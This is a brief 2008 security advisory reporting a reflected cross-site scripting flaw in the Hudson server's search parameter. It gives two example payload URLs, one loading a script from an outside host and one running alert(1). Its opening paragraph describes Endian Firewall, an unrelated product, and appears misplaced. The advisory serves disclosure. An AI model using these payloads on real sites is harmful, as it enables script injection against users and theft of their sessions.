hudson-xss.txt

`#Security Advisory - Multiple Vulnerabilities in hudson#   
  
Endian Firewall is a "turn-key" linux security distribution that turns every system into a full featured security appliance. It features stateful packet filtering, proxies, antivirus/antispam, content filtering and a VPN module.  
  
Date : July-11-2008  
Product : hudson  
Version : 1.223 - Prior version maybe also be affected  
Vendor : https://hudson.dev.java.net/  
Author : syniack  
Contact : [email protected]  
  
  
XSS Vulnerability: [TESTED]  
  
Security issue in the following file:  
  
hudson/search/?q=xss  
  
Example:  
  
http://www.example.com/hudson/search/?q="><scriptsrc=http://www.example2.com/re.js></script>  
  
http://www.example.com/hudson/search/?q="><script>alert(1);</script>  
  
Image URL:  
http://img81.imageshack.us/my.php?image=hudsongq2.jpg  
`